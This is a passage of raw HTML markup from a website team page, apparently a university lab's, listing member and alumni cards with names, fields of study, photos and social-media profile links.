<!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c149\" class=\"style-835 style-local-182-c149 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/joshua-quiroz-315713215/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-830-outer style-local-182-c150-outer\">\n            <div data-colibri-id=\"182-c150\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-830 style-local-182-c150 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c151\" class=\"d-block style-831 style-local-182-c151 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\" class=\"wp-image-1417 style-831-image style-local-182-c151-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-831-frameImage style-local-182-c151-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c152\" class=\"h-global-transition-all h-heading style-832 style-local-182-c152 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-832 style-local-182-c152\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Raiyan</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c153\" class=\"h-text h-text-component style-833 style-local-182-c153 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c154\" class=\"style-835 style-local-182-c154 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/joshua-quiroz-315713215/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c158\" id=\"alumni\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-910 style-local-182-c158 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c209\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-924 style-local-182-c209 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-925-outer style-local-182-c210-outer\">\n            <div data-colibri-id=\"182-c210\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-925 style-local-182-c210 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c211\" class=\"h-global-transition-all h-heading style-926 style-local-182-c211 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-926 style-local-182-c211\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Alumni</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c159\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-911 style-local-182-c159 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c160-outer\">\n            <div data-colibri-id=\"182-c160\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c160 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c161\" class=\"d-block style-913 style-local-182-c161 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Sarah_Akinola-scaled-2.jpg\" class=\"wp-image-1595 style-913-image style-local-182-c161-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c161-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c162\" class=\"h-global-transition-all h-heading style-914 style-local-182-c162 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c162\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sarah Akinola</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c163\" class=\"h-text h-text-component style-915 style-local-182-c163 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c164\" class=\"style-917 style-local-182-c164 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/akinola-sarah-035789138\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c165-outer\">\n            <div data-colibri-id=\"182-c165\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c165 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c166\" class=\"d-block style-918 style-local-182-c166 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Anvith.jpg\" class=\"wp-image-1597 style-918-image style-local-182-c166-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-918-frameImage style-local-182-c166-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c167\" class=\"h-global-transition-all h-heading style-914 style-local-182-c167 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c167\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anvith Anand</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c168\" class=\"h-text h-text-component style-915 style-local-182-c168 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c169\" class=\"style-919 style-local-182-c169 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anvith-anand\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c170-outer\">\n            <div data-colibri-id=\"182-c170\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c170 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c171\" class=\"d-block style-920 style-local-182-c171 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Alex.jpg\" class=\"wp-image-884 style-920-image style-local-182-c171-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-920-frameImage style-local-182-c171-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c172\" class=\"h-global-transition-all h-heading style-914 style-local-182-c172 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c172\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Asige</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c173\" class=\"h-text h-text-component style-915 style-local-182-c173 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c174\" class=\"style-921 style-local-182-c174 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://twitter.com/i/flow/login?redirect_after_login=%2FAsigeAlex\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1347.656 445.313c0 11.719 0 26.367 0 38.086 0 407.227-310.547 875.977-875.977 875.977-172.852 0-336.914-49.805-471.68-137.695 23.438 2.93 49.805 2.93 73.242 2.93 143.555 0 278.32-46.875 383.789-131.836-134.766 0-249.023-90.82-290.039-213.867 20.508 5.859 38.086 5.859 58.594 5.859 29.297 0 55.664-2.93 82.031-8.789-140.625-29.297-246.094-155.273-246.094-301.758 0-2.93 0-2.93 0-5.859 41.016 23.438 87.891 38.086 137.695 38.086-82.031-52.734-137.695-149.414-137.695-254.883 0-55.664 17.578-108.398 43.945-155.273 149.414 187.5 377.93 310.547 632.813 322.266-5.859-23.438-8.789-46.875-8.789-70.313 0-169.922 137.695-307.617 307.617-307.617 90.82 0 169.922 38.086 225.586 96.68 70.313-14.648 137.695-38.086 196.289-73.242-23.438 70.313-73.242 131.836-134.766 169.922 61.523-8.789 120.117-23.438 175.781-49.805-41.016 61.523-93.75 117.188-152.344 161.133z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c175-outer\">\n            <div data-colibri-id=\"182-c175\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c175 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c176\" class=\"d-block style-922 style-local-182-c176 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bhavya-scaled-1.jpg\" class=\"wp-image-776 style-922-image style-local-182-c176-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-922-frameImage style-local-182-c176-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c177\" class=\"h-global-transition-all h-heading style-914 style-local-182-c177 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c177\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bhavya Busireddy</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c178\" class=\"h-text h-text-component style-915 style-local-182-c178 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c179\" class=\"style-923 style-local-182-c179 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bhavya-busireddy-b052b192/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c180-outer\">\n            <div data-colibri-id=\"182-c180\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c180 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c181\" class=\"d-block style-913 style-local-182-c181 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Vineeth.jpg\" class=\"wp-image-831 style-913-image style-local-182-c181-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c181-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c182\" class=\"h-global-transition-all h-heading style-914 style-local-182-c182 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c182\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Vineeth Kumar Chandha</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c183\" class=\"h-text h-text-component style-915 style-local-182-c183 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c184\" class=\"style-917 style-local-182-c184 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/vineeth-kumar-chandha-207611149/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c185-outer\">\n            <div data-colibri-id=\"182-c185\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 